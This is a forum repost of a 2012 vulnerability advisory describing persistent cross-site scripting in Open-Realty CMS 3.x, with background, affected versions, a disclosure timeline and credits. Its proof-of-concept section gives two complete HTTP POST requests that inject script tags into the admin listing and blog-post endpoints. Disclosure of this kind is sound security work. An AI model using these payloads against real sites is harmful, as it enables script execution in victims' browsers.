Praetorian503 Posted December 27, 2012 Report Share Posted December 27, 2012 Open-Realty CMS version 3.x suffers from a cross site scripting vulnerability.1. OVERVIEWOpen-Realty CMS 3.x versions are vulnerable to Persistent Cross SiteScripting (XSS).2. BACKGROUNDOpen-Realty is the world's leading real estate listing marketing andmanagement CMS application, and has enjoyed being the real estate website software of choice for professional web site developers since2002.3. VULNERABILITY DESCRIPTIONMultiple parameters are not properly sanitized, which allows attackerto conduct Cross Site Scripting attack. This may allow an attacker tocreate a specially crafted URL that would execute arbitrary scriptcode in a victim's browser.4. VERSIONS AFFECTED3.x5. PROOF-OF-CONCEPT/EXPLOIT/admin/ajax.php (parameter: title, full_desc, ta)///////////////////////////////////////////////////////POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1Host: localhostContent-Length: 574Origin: http://localhostX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedCookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2¬es=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=///////////////////////////////////////////////////////POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1Host: localhostProxy-Connection: keep-aliveContent-Length: 112Origin: http://localhostX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedReferer: http://localhost/admin/index.php?action=edit_blog_post&id=65Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us///////////////////////////////////////////////////////6. SOLUTIONThe vendor has not responded to the report since 2012-11-17.It is recommended that an alternate software package be used in its place.7. VENDORTransparent Technologies Inc.http://www.transparent-support.com8. CREDITAung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.9. DISCLOSURE TIME-LINE2012-11-17: Vulnerability Reported2012-12-25: Vulnerability Disclosed10. REFERENCESOriginal Advisory URL:http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xssOpen-Realty Home Page: http://www.open-realty.org/#yehg [2012-12-25]---------------------------------Best regards,YGN Ethical Hacker GroupYangon, Myanmarhttp://yehg.netOur Lab | http://yehg.net/labOur Directory | http://yehg.net/hwdSource: yehg.net Quote Link to comment Share on other sites More sharing options...